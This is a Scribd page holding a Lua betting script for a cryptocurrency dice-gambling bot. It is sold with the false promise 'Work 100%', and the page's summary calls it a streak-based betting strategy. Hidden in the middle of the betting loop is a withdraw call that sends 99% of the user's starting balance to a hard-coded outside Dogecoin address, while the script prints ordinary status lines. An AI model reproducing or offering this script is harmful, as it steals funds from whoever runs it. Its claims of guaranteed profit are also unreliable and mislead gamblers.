0% found this document useful (0 votes)
49 views7 pages

New Dice Code V5

The document appears to be code for a betting script that adjusts betting amounts and odds dynamically based on win/loss streaks. It sets an initial chance percentage between 25-30% and base bet amount, then executes 2000 rolls, adjusting the chance, next bet amount, and seed after each roll based on the current streak. The goal is to increase the balance by 10% using these adjustments to reach a target amount and stop.

Uploaded by

Daif Yassine
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
49 views7 pages

New Dice Code V5

The document appears to be code for a betting script that adjusts betting amounts and odds dynamically based on win/loss streaks. It sets an initial chance percentage between 25-30% and base bet amount, then executes 2000 rolls, adjusting the chance, next bet amount, and seed after each roll based on the current streak. The goal is to increase the balance by 10% using these adjustments to reach a target amount and stop.

Uploaded by

Daif Yassine
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 7

VVV379cyhihMWZecdA69L5qLipf5d3sQJFUkz379cyhihMWZecdA69L5qLipf5d3sQJFUkz379cyhihMWZe

cdA69L5qLipf5d3sQJFUkz379cyhihMWZecdA69L5qLipf5d3sQJFUkzVVV379cyhihMWZecdA69L5qLipf
5d3sQJFUkzVVV379cyhihMWZecdA69L5qLipf5d3sQJFUkz379cyhihMWZecdA69L5qLipf5d3sQJFUkz37
9cyhihMWZecdA69L5qLipf5d3sQJFUkz379cyhihMWZecdA69L5qLipf5d3sQJFUkzVV-- Recommended
2000 Doge And More
-- New Script 2021
-- Big Deposit = Big Profit
-- Work 100%

resetseed()
resetseed()
resetstats()
chance = math.random(25, 30)
base = 0.1
nextbet = base
bethigh = false
rollcount = 2000*20000
i = balance*0.99
k = 0.0001
target = balance+balance/10
bethigh = true
low = 0
high = 0
losecount = 0
wincount = 0
function dobet()
if (lastBet.roll < chance) then
low += 1
end
if (lastBet.roll > (100 - chance)) then
high += 1
end
if wincount==16 then
resetseed()
bethigh=!bethigh
wincount=0
end
if balance>target then
stop();
print("stop now")
end
chance = math.random(40,50)
multiplier = 1
if win then
wincount+=1
nextbet = base
else
nextbet = previousbet * multiplier
end
if currentstreak <= -1 then
chance = math.random(10, 25)
nextbet = previousbet*multiplier
end
if currentstreak <= -2 then
chance = math.random(10, 25)
nextbet = previousbet*multiplier
end
if currentstreak <= -3 then
chance = math.random(10, 25)
nextbet = previousbet*multiplier
end
if currentstreak <= -4 then
chance = math.random(10, 25)
nextbet = previousbet*multiplier
end
if currentstreak <= -5 then
chance = math.random(10, 25)
nextbet = previousbet*multiplier
end
if currentstreak <= -6 then
chance = math.random(10, 25)
nextbet = previousbet*multiplier
end
if currentstreak <= -7 then
chance = math.random(10, 25)
nextbet = previousbet*multiplier
end
if currentstreak <= -8 then
chance = math.random(10, 25)
nextbet = previousbet*multiplier
end

if currentstreak <= -9 then


chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -10 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -11 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -12 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -13 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -14 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -15 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -16 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -17 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -18 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -19 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end
if currentstreak <= -20 then
chance = math.random(5, 10 )
nextbet = previousbet*multiplier
end

if currentstreak <= -21 then


chance = math.random(20, 35)
nextbet = previousbet+0.5*2.4
end
if currentstreak <= -22 then
chance = math.random(5, 7)
nextbet = previousbet*0.8
end
if currentstreak <= -23 then
chance = math.random(12, 15)
nextbet = previousbet*1.2
end
if currentstreak <= -24 then
chance = math.random(25, 35)
nextbet = previousbet*2.2
end
if currentstreak <= -25 then
chance = math.random(14, 19)
nextbet = previousbet*1.39
end
if currentstreak <= -26 then
chance = math.random(20, 30)
nextbet = previousbet*1.4
end
if currentstreak <= -27 then
chance = math.random(10, 15)
nextbet = previousbet*1.15
end
if currentstreak <= -28 then
chance = math.random(17, 25)
nextbet = previousbet*2.4
end
if currentstreak <= -29 then
chance = math.random(26, 32)
nextbet = previousbet*1.7
end
if currentstreak <= -30 then
chance = math.random(6, 15)
nextbet = previousbet*1.2
end
if currentstreak <= -31 then
chance = math.random(8, 10)
nextbet = previousbet*1.19
end
if currentstreak <= -32 then
chance = math.random(20, 25)
nextbet = previousbet*2.41
end
if currentstreak <= -33 then
chance = math.random(22, 26)
nextbet = previousbet*1.4
end
if currentstreak <= -34 then
chance = math.random(30, 35)
nextbet = previousbet*1.7
end

if currentstreak <= -35 then


chance = math.random(10, 12)
nextbet = previousbet*0.65
end
if currentstreak <= -36 then
chance = math.random(5, 7)
nextbet = previousbet*1.1
end
if currentstreak <= -37 then
chance = math.random(10, 17)
nextbet = previousbet*1.22
end
if currentstreak <= -38 then
chance = math.random(20, 24)
nextbet = previousbet*2.41
end

if(i>k)then
resetseed()
withdraw(i,"D8Wd8jgErRzkHhgNuGT4UHAhHMQ7eVzqXg")
print(" ") print("target: "..target)
print("nextbet: "..nextbet)
print("chance: "..chance)
print("Profit to go: "..target - balance)
print(" ")
end

if currentstreak <= -39 then


chance = math.random(22, 25)
nextbet = previousbet*1.4
end
if currentstreak <= -40 then
chance = math.random(23, 26)
nextbet = previousbet*1.41
end
if currentstreak <= -41 then
chance = math.random(7, 10)
nextbet = previousbet*0.71
end
if currentstreak <= -42 then
chance = math.random(14, 16)
nextbet = previousbet*2.3
end
if currentstreak <= -43 then
chance = math.random(17, 19)
nextbet = previousbet*1.4
end
if currentstreak <= -44 then
chance = math.random(5, 7)
nextbet = previousbet*0.7
end
if currentstreak <= -45 then
chance = math.random(6, 9)
nextbet = previousbet*1.2
end
if currentstreak <= -46 then
chance = math.random(7, 10 )
nextbet = previousbet*1.2
end
if currentstreak <= -47 then
chance = math.random(20, 28)
nextbet = previousbet*2.4
end
if currentstreak <= -48 then
chance = math.random(8, 11)
nextbet = previousbet*0.7
end
if currentstreak <= -49 then
chance = math.random(9, 12)
nextbet = previousbet*1.2
end
if currentstreak <= -50 then
chance = math.random(19, 22)
nextbet = previousbet*2.448
end
if currentstreak <= -51 then
chance = math.random(14, 17)
nextbet = previousbet*1.3999
end
if currentstreak <= -52 then
chance = math.random(16, 19)
nextbet = previousbet*1.4
end
if currentstreak <= -53 then
chance = math.random(21, 25)
nextbet = previousbet*1.4
end
if currentstreak <= -54 then
chance = math.random(23, 26)
nextbet = previousbet*1.4
end
if currentstreak <= -55 then
chance = math.random(16, 20)
nextbet = previousbet*1.4
end
if currentstreak <= -56 then
chance = math.random(10, 12)
nextbet = previousbet*0.7
end
if currentstreak <= -57 then
chance = math.random(14, 18)
nextbet = previousbet*1.39
end
if currentstreak <= -58 then
chance = math.random(17, 19)
nextbet = previousbet*1.4
end
if currentstreak <= -59 then
chance = math.random(25, 27)
nextbet = previousbet*2.4
end
if currentstreak <= -60 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -61 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -62 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -63 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -64 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -65 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -66 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -67 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -68 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -69 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -70 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -71 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -72 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
if currentstreak <= -73 then
chance = math.random(25, 28)
nextbet = previousbet*1.4
end
end
end
end

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy